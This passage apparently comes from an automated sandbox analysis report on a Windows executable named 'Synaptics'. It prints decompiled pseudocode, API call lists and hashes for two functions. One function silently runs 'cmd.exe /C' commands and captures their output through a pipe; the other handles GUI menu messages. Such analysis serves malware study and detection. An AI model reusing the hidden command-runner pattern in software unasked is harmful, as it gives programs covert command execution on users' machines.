                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 18F14E30A00204EFDB01DBA9C985F9E77F5AB05305F6545B6E944AB3A3D738BE44DB48
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00475384 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 158processfilesynchronizationCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 38%
                                                                                                                                                                                                                            			E00475384(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __esi, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				long _v24;
				char _v28;
				struct _SECURITY_ATTRIBUTES _v40;
				struct _STARTUPINFOA _v108;
				struct _PROCESS_INFORMATION _v124;
				char _v380;
				char _v384;
				char _v388;
				CHAR* _t77;
				void* _t112;
				intOrPtr _t125;
				intOrPtr _t126;
				void* _t131;
				void* _t133;
				void* _t134;
				intOrPtr _t135;

				_t133 = _t134;
				_t135 = _t134 + 0xfffffe80;
				_v388 = 0;
				_v384 = 0;
				_v28 = 0;
				_t131 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				E00404E70(_v12);
				_push(_t133);
				_push(0x4755bb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t135;
				E004049C0(__ecx);
				_v40.nLength = 0xc;
				_v40.bInheritHandle = 0xffffffff;
				_v40.lpSecurityDescriptor = 0;
				CreatePipe( &_v16,  &_v20,  &_v40, 0);
				_push(_t133);
				_push(0x475581);
				_push( *[fs:eax]);
				 *[fs:eax] = _t135;
				E004032B4( &_v108, 0x44);
				_v108.cb = 0x44;
				_v108.dwFlags = 0x101;
				_v108.wShowWindow = 0;
				_v108.hStdInput = GetStdHandle(0xfffffff6);
				_v108.hStdOutput = _v20;
				_v108.hStdError = _v20;
				if(E00409A58(_v12) == 0) {
					E00404A58( &_v28, 0x4755d0);
				} else {
					E00404A58( &_v28, _v12);
				}
				_t77 = E00404E80(_v28);
				E00404CCC( &_v384, _v8, "cmd.exe /C ");
				CreateProcessA(0, E00404E80(_v384), 0, 0, 0xffffffff, 0, 0, _t77,  &_v108,  &_v124);
				asm("sbb ebx, ebx");
				_t112 = 1;
				CloseHandle(_v20);
				if(1 == 0) {
					_pop(_t125);
					 *[fs:eax] = _t125;
					_push(E00475588);
					return CloseHandle(_v16);
				} else {
					_push(_t133);
					_push(0x475563);
					_push( *[fs:eax]);
					 *[fs:eax] = _t135;
					do {
						ReadFile(_v16,  &_v380, 0xff,  &_v24, 0);
						asm("sbb ebx, ebx");
						_t112 = _t112 + 1;
						if(_v24 > 0) {
							 *((char*)(_t133 + _v24 - 0x178)) = 0;
							OemToCharA( &_v380,  &_v380);
							E00404C30( &_v388, 0x100,  &_v380);
							E00404C88(_t131, _v388);
						}
					} while (_t112 != 0 && _v24 != 0);
					WaitForSingleObject(_v124.hProcess, 0xffffffff);
					_pop(_t126);
					 *[fs:eax] = _t126;
					_push(E0047556A);
					CloseHandle(_v124.hThread);
					return CloseHandle(_v124);
				}
			}























                                                                                                                                                                                                                            0x00475385
                                                                                                                                                                                                                            0x00475387
                                                                                                                                                                                                                            0x00475391
                                                                                                                                                                                                                            0x00475397
                                                                                                                                                                                                                            0x0047539d
                                                                                                                                                                                                                            0x004753a0
                                                                                                                                                                                                                            0x004753a2
                                                                                                                                                                                                                            0x004753a5
                                                                                                                                                                                                                            0x004753ab
                                                                                                                                                                                                                            0x004753b3
                                                                                                                                                                                                                            0x004753ba
                                                                                                                                                                                                                            0x004753bb
                                                                                                                                                                                                                            0x004753c0
                                                                                                                                                                                                                            0x004753c3
                                                                                                                                                                                                                            0x004753c8
                                                                                                                                                                                                                            0x004753cd
                                                                                                                                                                                                                            0x004753d4
                                                                                                                                                                                                                            0x004753dd
                                                                                                                                                                                                                            0x004753ee
                                                                                                                                                                                                                            0x004753f5
                                                                                                                                                                                                                            0x004753f6
                                                                                                                                                                                                                            0x004753fb
                                                                                                                                                                                                                            0x004753fe
                                                                                                                                                                                                                            0x0047540b
                                                                                                                                                                                                                            0x00475410
                                                                                                                                                                                                                            0x00475417
                                                                                                                                                                                                                            0x0047541e
                                                                                                                                                                                                                            0x0047542b
                                                                                                                                                                                                                            0x00475431
                                                                                                                                                                                                                            0x00475437
                                                                                                                                                                                                                            0x00475444
                                                                                                                                                                                                                            0x0047545b
                                                                                                                                                                                                                            0x00475446
                                                                                                                                                                                                                            0x0047544c
                                                                                                                                                                                                                            0x0047544c
                                                                                                                                                                                                                            0x0047546b
                                                                                                                                                                                                                            0x00475489
                                                                                                                                                                                                                            0x0047549c
                                                                                                                                                                                                                            0x004754a4
                                                                                                                                                                                                                            0x004754a6
                                                                                                                                                                                                                            0x004754ab
                                                                                                                                                                                                                            0x004754b2
                                                                                                                                                                                                                            0x0047556c
                                                                                                                                                                                                                            0x0047556f
                                                                                                                                                                                                                            0x00475572
                                                                                                                                                                                                                            0x00475580
                                                                                                                                                                                                                            0x004754b8
                                                                                                                                                                                                                            0x004754ba
                                                                                                                                                                                                                            0x004754bb
                                                                                                                                                                                                                            0x004754c0
                                                                                                                                                                                                                            0x004754c3
                                                                                                                                                                                                                            0x004754c6
                                                                                                                                                                                                                            0x004754dc
                                                                                                                                                                                                                            0x004754e4
                                                                                                                                                                                                                            0x004754e6
                                                                                                                                                                                                                            0x004754eb
                                                                                                                                                                                                                            0x004754f0
                                                                                                                                                                                                                            0x00475506
                                                                                                                                                                                                                            0x0047551c
                                                                                                                                                                                                                            0x00475529
                                                                                                                                                                                                                            0x00475529
                                                                                                                                                                                                                            0x0047552e
                                                                                                                                                                                                                            0x0047553e
                                                                                                                                                                                                                            0x00475545
                                                                                                                                                                                                                            0x00475548
                                                                                                                                                                                                                            0x0047554b
                                                                                                                                                                                                                            0x00475554
                                                                                                                                                                                                                            0x00475562
                                                                                                                                                                                                                            0x00475562

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,004755BB,?,00000000,021E2A8C,?,00495E40,?,021E2A8C,021E2A8C,00000000,00000000), ref: 004753EE
                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00475581,?,?,?), ref: 00475426
                                                                                                                                                                                                                              • Part of subcall function 00409A58: GetFileAttributesA.KERNEL32(00000000,00000000,00496E89,00000000,00496FE6), ref: 00409A63
                                                                                                                                                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,00475581,000000F6,00000000,00475581,?,?,?), ref: 0047549C
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,00475581,000000F6,00000000,00475581,?,?), ref: 004754AB
                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,000000FF,?,00000000,00000000,00475563,?,?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 004754DC
                                                                                                                                                                                                                            • OemToCharA.USER32(00000000,00000000), ref: 00475506
                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00475581,000000FF,?,?,000000FF,?,00000000,00000000,00475563,?,?,00000000,00000000,00000000,00000000,000000FF), ref: 0047553E
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,0047556A,?,000000FF,?,00000000,00000000,00475563,?,?,00000000,00000000,00000000,00000000,000000FF,00000000), ref: 00475554
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00475581,?,0047556A,?,000000FF,?,00000000,00000000,00475563,?,?,00000000,00000000,00000000,00000000,000000FF), ref: 0047555D
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Handle$Close$CreateFile$AttributesCharObjectPipeProcessReadSingleWait
                                                                                                                                                                                                                            • String ID: C:\$D$cmd.exe /C
                                                                                                                                                                                                                            • API String ID: 3269375759-2807548070
                                                                                                                                                                                                                            • Opcode ID: 15fdb282fb5a70a6ac8dca0f18dfeb7b610c3755cc11197428ccb14af1d051a8
                                                                                                                                                                                                                            • Instruction ID: 82437ea0ccec46d2af5a08e72f5cf6232f0238eba76bb00f3cc1c06be9a4dd54
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15fdb282fb5a70a6ac8dca0f18dfeb7b610c3755cc11197428ccb14af1d051a8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6E5150B1904608AFDB10EFA5C881BDEB7B8EB48314F51457AF518F72C1DB785E448B68
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0044EA40 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 405nativeCOMMONCrypto
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                                                                            			E0044EA40(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				struct HMENU__* _v12;
				signed int _v16;
				char _v17;
				intOrPtr _v24;
				int _v28;
				struct HDC__* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr* _v48;
				char _v52;
				intOrPtr _t137;
				signed int _t138;
				intOrPtr _t144;
				signed int _t150;
				signed int _t151;
				intOrPtr* _t153;
				void* _t158;
				struct HMENU__* _t160;
				intOrPtr* _t165;
				void* _t173;
				signed int _t177;
				signed int _t181;
				void* _t182;
				void* _t214;
				struct HDC__* _t221;
				void* _t251;
				signed int _t257;
				void* _t265;
				signed int _t271;
				signed int _t272;
				signed int _t274;
				signed int _t275;
				signed int _t277;
				signed int _t278;
				signed int _t280;
				signed int _t281;
				signed int _t283;
				signed int _t284;
				signed int _t286;
				signed int _t287;
				signed int _t290;
				signed int _t291;
				intOrPtr _t307;
				intOrPtr _t311;
				intOrPtr _t333;
				intOrPtr _t342;
				intOrPtr _t346;
				intOrPtr* _t353;
				signed int _t355;
				intOrPtr* _t356;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				intOrPtr* _t375;
				void* _t377;
				void* _t378;
				intOrPtr _t379;
				void* _t380;

				_t377 = _t378;
				_t379 = _t378 + 0xffffffd0;
				_v52 = 0;
				_t375 = __edx;
				_v8 = __eax;
				_push(_t377);
				_push(0x44ef73);
				_push( *[fs:eax]);
				 *[fs:eax] = _t379;
				_t137 =  *__edx;
				_t380 = _t137 - 0x111;
				if(_t380 > 0) {
					_t138 = _t137 - 0x117;
					__eflags = _t138;
					if(_t138 == 0) {
						_t271 =  *((intOrPtr*)(_v8 + 8)) - 1;
						__eflags = _t271;
						if(_t271 < 0) {
							goto L67;
						} else {
							_t272 = _t271 + 1;
							_t367 = 0;
							__eflags = 0;
							while(1) {
								_t150 = E0044DDEC(E0041AC6C(_v8, _t367),  *(_t375 + 4), __eflags);
								__eflags = _t150;
								if(_t150 != 0) {
									goto L68;
								}
								_t367 = _t367 + 1;
								_t272 = _t272 - 1;
								__eflags = _t272;
								if(_t272 != 0) {
									continue;
								} else {
									goto L67;
								}
								goto L68;
							}
						}
					} else {
						_t151 = _t138 - 8;
						__eflags = _t151;
						if(_t151 == 0) {
							_v17 = 0;
							__eflags =  *(__edx + 6) & 0x00000010;
							if(( *(__edx + 6) & 0x00000010) != 0) {
								_v17 = 1;
							}
							_t274 =  *((intOrPtr*)(_v8 + 8)) - 1;
							__eflags = _t274;
							if(__eflags < 0) {
								L32:
								_t153 =  *0x49dbcc; // 0x49ebb8
								E0045B010( *_t153, 0, __eflags);
								goto L67;
							} else {
								_t275 = _t274 + 1;
								_t368 = 0;
								__eflags = 0;
								while(1) {
									__eflags = _v17 - 1;
									if(_v17 != 1) {
										_v12 =  *(_t375 + 4) & 0x0000ffff;
									} else {
										_t160 =  *(_t375 + 8);
										__eflags = _t160;
										if(_t160 == 0) {
											_v12 = 0xffffffff;
										} else {
											_v12 = GetSubMenu(_t160,  *(_t375 + 4) & 0x0000ffff);
										}
									}
									_t158 = E0041AC6C(_v8, _t368);
									_t295 = _v17;
									_v16 = E0044DD30(_t158, _v17, _v12);
									__eflags = _v16;
									if(__eflags != 0) {
										break;
									}
									_t368 = _t368 + 1;
									_t275 = _t275 - 1;
									__eflags = _t275;
									if(__eflags != 0) {
										continue;
									} else {
										goto L32;
									}
									goto L68;
								}
								E004380E0( *((intOrPtr*)(_v16 + 0x58)), _t295,  &_v52, __eflags);
								_t165 =  *0x49dbcc; // 0x49ebb8
								E0045B010( *_t165, _v52, __eflags);
							}
						} else {
							__eflags = _t151 == 1;
							if(_t151 == 1) {
								_t277 =  *((intOrPtr*)(_v8 + 8)) - 1;
								__eflags = _t277;
								if(_t277 < 0) {
									goto L67;
								} else {
									_t278 = _t277 + 1;
									_t369 = 0;
									__eflags = 0;
									while(1) {
										_v48 = E0041AC6C(_v8, _t369);
										_t173 =  *((intOrPtr*)( *_v48 + 0x34))();
										__eflags = _t173 -  *(_t375 + 8);
										if(_t173 ==  *(_t375 + 8)) {
											break;
										}
										_t177 = E0044DD30(_v48, 1,  *(_t375 + 8));
										__eflags = _t177;
										if(_t177 == 0) {
											_t369 = _t369 + 1;
											_t278 = _t278 - 1;
											__eflags = _t278;
											if(_t278 != 0) {
												continue;
											} else {
												goto L67;
											}
										} else {
											break;
										}
										goto L68;
									}
									E0044E630(_v48, _t375);
								}
							} else {
								goto L67;
							}
						}
					}
					goto L68;
				} else {
					if(_t380 == 0) {
						_t280 =  *((intOrPtr*)(_v8 + 8)) - 1;
						__eflags = _t280;
						if(_t280 < 0) {
							goto L67;
						} else {
							_t281 = _t280 + 1;
							_t370 = 0;
							__eflags = 0;
							while(1) {
								E0041AC6C(_v8, _t370);
								_t181 = E0044DDD0( *(_t375 + 4), __eflags);
								__eflags = _t181;
								if(_t181 != 0) {
									goto L68;
								}
								_t370 = _t370 + 1;
								_t281 = _t281 - 1;
								__eflags = _t281;
								if(_t281 != 0) {
									continue;
								} else {
									goto L67;
								}
								goto L68;
							}
						}
						goto L68;
					} else {
						_t182 = _t137 - 0x2b;
						if(_t182 == 0) {
							_v40 =  *((intOrPtr*)(__edx + 8));
							_t283 =  *((intOrPtr*)(_v8 + 8)) - 1;
							__eflags = _t283;
							if(_t283 < 0) {
								goto L67;
							} else {
								_t284 = _t283 + 1;
								_t371 = 0;
								__eflags = 0;
								while(1) {
									_v16 = E0044DD30(E0041AC6C(_v8, _t371), 0,  *((intOrPtr*)(_v40 + 8)));
									__eflags = _v16;
									if(_v16 != 0) {
										break;
									}
									_t371 = _t371 + 1;
									_t284 = _t284 - 1;
									__eflags = _t284;
									if(_t284 != 0) {
										continue;
									} else {
										goto L67;
									}
									goto L69;
								}
								_v24 = E0042572C(0, 1);
								_push(_t377);
								_push(0x44eda6);
								_push( *[fs:eax]);
								 *[fs:eax] = _t379;
								_v28 = SaveDC( *(_v40 + 0x18));
								_push(_t377);
								_push(0x44ed89);
								_push( *[fs:eax]);
								 *[fs:eax] = _t379;
								E00425CE8(_v24,  *(_v40 + 0x18));
								E00425B88(_v24);
								E0044F218(_v16, _v40 + 0x1c, _v24,  *((intOrPtr*)(_v40 + 0x10)));
								_pop(_t333);
								 *[fs:eax] = _t333;
								_push(0x44ed90);
								__eflags = 0;
								E00425CE8(_v24, 0);
								return RestoreDC( *(_v40 + 0x18), _v28);
							}
						} else {
							_t214 = _t182 - 1;
							if(_t214 == 0) {
								_v44 =  *((intOrPtr*)(__edx + 8));
								_t286 =  *((intOrPtr*)(_v8 + 8)) - 1;
								__eflags = _t286;
								if(_t286 < 0) {
									goto L67;
								} else {
									_t287 = _t286 + 1;
									_t372 = 0;
									__eflags = 0;
									while(1) {
										_v16 = E0044DD30(E0041AC6C(_v8, _t372), 0,  *((intOrPtr*)(_v44 + 8)));
										__eflags = _v16;
										if(_v16 != 0) {
											break;
										}
										_t372 = _t372 + 1;
										_t287 = _t287 - 1;
										__eflags = _t287;
										if(_t287 != 0) {
											continue;
										} else {
											goto L67;
										}
										goto L69;
									}
									_t221 =  *((intOrPtr*)(_v8 + 0x10));
									L00407730();
									_v32 = _t221;
									 *[fs:eax] = _t379;
									_v24 = E0042572C(0, 1);
									 *[fs:eax] = _t379;
									_v28 = SaveDC(_v32);
									 *[fs:eax] = _t379;
									E00425CE8(_v24, _v32);
									E00425B88(_v24);
									 *((intOrPtr*)( *_v16 + 0x38))(_v44 + 0x10,  *[fs:eax], 0x44eea7, _t377,  *[fs:eax], 0x44eec4, _t377,  *[fs:eax], 0x44eee9, _t377, _t221);
									_pop(_t342);
									 *[fs:eax] = _t342;
									_push(0x44eeae);
									__eflags = 0;
									E00425CE8(_v24, 0);
									return RestoreDC(_v32, _v28);
								}
							} else {
								if(_t214 == 0x27) {
									_v36 =  *((intOrPtr*)(__edx + 8));
									_t290 =  *((intOrPtr*)(_v8 + 8)) - 1;
									__eflags = _t290;
									if(_t290 < 0) {
										goto L67;
									} else {
										_t291 = _t290 + 1;
										_t373 = 0;
										__eflags = 0;
										while(1) {
											_t251 =  *((intOrPtr*)( *((intOrPtr*)(E0041AC6C(_v8, _t373))) + 0x34))();
											_t346 = _v36;
											__eflags = _t251 -  *((intOrPtr*)(_t346 + 0xc));
											if(_t251 !=  *((intOrPtr*)(_t346 + 0xc))) {
												_v16 = E0044DD30(E0041AC6C(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 0xc)));
											} else {
												_v16 =  *((intOrPtr*)(E0041AC6C(_v8, _t373) + 0x34));
											}
											__eflags = _v16;
											if(_v16 != 0) {
												break;
											}
											_t373 = _t373 + 1;
											_t291 = _t291 - 1;
											__eflags = _t291;
											if(_t291 != 0) {
												continue;
											} else {
												goto L67;
											}
											goto L68;
										}
										_t257 = E0044DD60(E0041AC6C(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 8)));
										__eflags = _t257;
										if(_t257 == 0) {
											_t265 = E0041AC6C(_v8, _t373);
											__eflags = 0;
											_t257 = E0044DD60(_t265, 0,  *((intOrPtr*)(_v36 + 0xc)));
										}
										_t353 =  *0x49de0c; // 0x49ebbc
										_t56 =  *_t353 + 0x6c; // 0x0
										_t355 =  *_t56;
										__eflags = _t355;
										if(_t355 != 0) {
											__eflags = _t257;
											if(_t257 == 0) {
												_t257 =  *(_t355 + 0x158);
											}
											_t307 =  *0x49de0c; // 0x49ebbc
											__eflags =  *(_t355 + 0x228) & 0x00000008;
											if(( *(_t355 + 0x228) & 0x00000008) == 0) {
												_t356 =  *0x49dbcc; // 0x49ebb8
												E0045ACB4( *_t356, _t291, _t307, _t257, _t373, _t375);
											} else {
												E0045AD1C();
											}
										}
									}
								} else {
									L67:
									_push( *(_t375 + 8));
									_push( *(_t375 + 4));
									_push( *_t375);
									_t144 =  *((intOrPtr*)(_v8 + 0x10));
									_push(_t144);
									L00407540();
									 *((intOrPtr*)(_t375 + 0xc)) = _t144;
								}
								L68:
								_pop(_t311);
								 *[fs:eax] = _t311;
								_push(0x44ef7a);
								return E004049C0( &_v52);
							}
						}
					}
				}
				L69:
			}



































































                                                                                                                                                                                                                            0x0044ea41
                                                                                                                                                                                                                            0x0044ea43
                                                                                                                                                                                                                            0x0044ea4b
                                                                                                                                                                                                                            0x0044ea4e
                                                                                                                                                                                                                            0x0044ea50
                                                                                                                                                                                                                            0x0044ea55
                                                                                                                                                                                                                            0x0044ea56
                                                                                                                                                                                                                            0x0044ea5b
                                                                                                                                                                                                                            0x0044ea5e
                                                                                                                                                                                                                            0x0044ea61
                                                                                                                                                                                                                            0x0044ea63
                                                                                                                                                                                                                            0x0044ea68
                                                                                                                                                                                                                            0x0044ea8a
                                                                                                                                                                                                                            0x0044ea8a
                                                                                                                                                                                                                            0x0044ea8f
                                                                                                                                                                                                                            0x0044eade
                                                                                                                                                                                                                            0x0044eadf
                                                                                                                                                                                                                            0x0044eae1
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044eae7
                                                                                                                                                                                                                            0x0044eae7
                                                                                                                                                                                                                            0x0044eae8
                                                                                                                                                                                                                            0x0044eae8
                                                                                                                                                                                                                            0x0044eaea
                                                                                                                                                                                                                            0x0044eaf7
                                                                                                                                                                                                                            0x0044eafc
                                                                                                                                                                                                                            0x0044eafe
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044eb04
                                                                                                                                                                                                                            0x0044eb05
                                                                                                                                                                                                                            0x0044eb05
                                                                                                                                                                                                                            0x0044eb06
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044eb08
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044eb08
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044eb06
                                                                                                                                                                                                                            0x0044eaea
                                                                                                                                                                                                                            0x0044ea91
                                                                                                                                                                                                                            0x0044ea91
                                                                                                                                                                                                                            0x0044ea91
                                                                                                                                                                                                                            0x0044ea94
                                                                                                                                                                                                                            0x0044eb0d
                                                                                                                                                                                                                            0x0044eb11
                                                                                                                                                                                                                            0x0044eb15
                                                                                                                                                                                                                            0x0044eb17
                                                                                                                                                                                                                            0x0044eb17
                                                                                                                                                                                                                            0x0044eb21
                                                                                                                                                                                                                            0x0044eb22
                                                                                                                                                                                                                            0x0044eb24
                                                                                                                                                                                                                            0x0044eb9a
                                                                                                                                                                                                                            0x0044eb9a
                                                                                                                                                                                                                            0x0044eba3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044eb26
                                                                                                                                                                                                                            0x0044eb26
                                                                                                                                                                                                                            0x0044eb27
                                                                                                                                                                                                                            0x0044eb27
                                                                                                                                                                                                                            0x0044eb29
                                                                                                                                                                                                                            0x0044eb29
                                                                                                                                                                                                                            0x0044eb2d
                                                                                                                                                                                                                            0x0044eb53
                                                                                                                                                                                                                            0x0044eb2f
                                                                                                                                                                                                                            0x0044eb2f
                                                                                                                                                                                                                            0x0044eb32
                                                                                                                                                                                                                            0x0044eb34
                                                                                                                                                                                                                            0x0044eb46
                                                                                                                                                                                                                            0x0044eb36
                                                                                                                                                                                                                            0x0044eb41
                                                                                                                                                                                                                            0x0044eb41
                                                                                                                                                                                                                            0x0044eb34
                                                                                                                                                                                                                            0x0044eb5b
                                                                                                                                                                                                                            0x0044eb60
                                                                                                                                                                                                                            0x0044eb6b
                                                                                                                                                                                                                            0x0044eb6e
                                                                                                                                                                                                                            0x0044eb72
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044eb96
                                                                                                                                                                                                                            0x0044eb97
                                                                                                                                                                                                                            0x0044eb97
                                                                                                                                                                                                                            0x0044eb98
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044eb98
                                                                                                                                                                                                                            0x0044eb7d
                                                                                                                                                                                                                            0x0044eb85
                                                                                                                                                                                                                            0x0044eb8c
                                                                                                                                                                                                                            0x0044eb8c
                                                                                                                                                                                                                            0x0044ea96
                                                                                                                                                                                                                            0x0044ea96
                                                                                                                                                                                                                            0x0044ea97
                                                                                                                                                                                                                            0x0044ef00
                                                                                                                                                                                                                            0x0044ef01
                                                                                                                                                                                                                            0x0044ef03
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ef05
                                                                                                                                                                                                                            0x0044ef05
                                                                                                                                                                                                                            0x0044ef06
                                                                                                                                                                                                                            0x0044ef06
                                                                                                                                                                                                                            0x0044ef08
                                                                                                                                                                                                                            0x0044ef12
                                                                                                                                                                                                                            0x0044ef1a
                                                                                                                                                                                                                            0x0044ef1d
                                                                                                                                                                                                                            0x0044ef20
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ef2a
                                                                                                                                                                                                                            0x0044ef2f
                                                                                                                                                                                                                            0x0044ef31
                                                                                                                                                                                                                            0x0044ef3f
                                                                                                                                                                                                                            0x0044ef40
                                                                                                                                                                                                                            0x0044ef40
                                                                                                                                                                                                                            0x0044ef41
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ef31
                                                                                                                                                                                                                            0x0044ef38
                                                                                                                                                                                                                            0x0044ef38
                                                                                                                                                                                                                            0x0044ea9d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ea9d
                                                                                                                                                                                                                            0x0044ea97
                                                                                                                                                                                                                            0x0044ea94
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ea6a
                                                                                                                                                                                                                            0x0044ea6a
                                                                                                                                                                                                                            0x0044eaa8
                                                                                                                                                                                                                            0x0044eaa9
                                                                                                                                                                                                                            0x0044eaab
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044eab1
                                                                                                                                                                                                                            0x0044eab1
                                                                                                                                                                                                                            0x0044eab2
                                                                                                                                                                                                                            0x0044eab2
                                                                                                                                                                                                                            0x0044eab4
                                                                                                                                                                                                                            0x0044eab9
                                                                                                                                                                                                                            0x0044eac2
                                                                                                                                                                                                                            0x0044eac7
                                                                                                                                                                                                                            0x0044eac9
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044eacf
                                                                                                                                                                                                                            0x0044ead0
                                                                                                                                                                                                                            0x0044ead0
                                                                                                                                                                                                                            0x0044ead1
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ead3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ead3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ead1
                                                                                                                                                                                                                            0x0044eab4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ea6c
                                                                                                                                                                                                                            0x0044ea6c
                                                                                                                                                                                                                            0x0044ea6f
                                                                                                                                                                                                                            0x0044ecb2
                                                                                                                                                                                                                            0x0044ecbb
                                                                                                                                                                                                                            0x0044ecbc
                                                                                                                                                                                                                            0x0044ecbe
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ecc4
                                                                                                                                                                                                                            0x0044ecc4
                                                                                                                                                                                                                            0x0044ecc5
                                                                                                                                                                                                                            0x0044ecc5
                                                                                                                                                                                                                            0x0044ecc7
                                                                                                                                                                                                                            0x0044ecde
                                                                                                                                                                                                                            0x0044ece1
                                                                                                                                                                                                                            0x0044ece5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044edad
                                                                                                                                                                                                                            0x0044edae
                                                                                                                                                                                                                            0x0044edae
                                                                                                                                                                                                                            0x0044edaf
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044edb5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044edb5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044edaf
                                                                                                                                                                                                                            0x0044ecf7
                                                                                                                                                                                                                            0x0044ecfc
                                                                                                                                                                                                                            0x0044ecfd
                                                                                                                                                                                                                            0x0044ed02
                                                                                                                                                                                                                            0x0044ed05
                                                                                                                                                                                                                            0x0044ed14
                                                                                                                                                                                                                            0x0044ed19
                                                                                                                                                                                                                            0x0044ed1a
                                                                                                                                                                                                                            0x0044ed1f
                                                                                                                                                                                                                            0x0044ed22
                                                                                                                                                                                                                            0x0044ed2e
                                                                                                                                                                                                                            0x0044ed43
                                                                                                                                                                                                                            0x0044ed5c
                                                                                                                                                                                                                            0x0044ed63
                                                                                                                                                                                                                            0x0044ed66
                                                                                                                                                                                                                            0x0044ed69
                                                                                                                                                                                                                            0x0044ed6e
                                                                                                                                                                                                                            0x0044ed73
                                                                                                                                                                                                                            0x0044ed88
                                                                                                                                                                                                                            0x0044ed88
                                                                                                                                                                                                                            0x0044ea75
                                                                                                                                                                                                                            0x0044ea75
                                                                                                                                                                                                                            0x0044ea76
                                                                                                                                                                                                                            0x0044edbd
                                                                                                                                                                                                                            0x0044edc6
                                                                                                                                                                                                                            0x0044edc7
                                                                                                                                                                                                                            0x0044edc9
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044edcf
                                                                                                                                                                                                                            0x0044edcf
                                                                                                                                                                                                                            0x0044edd0
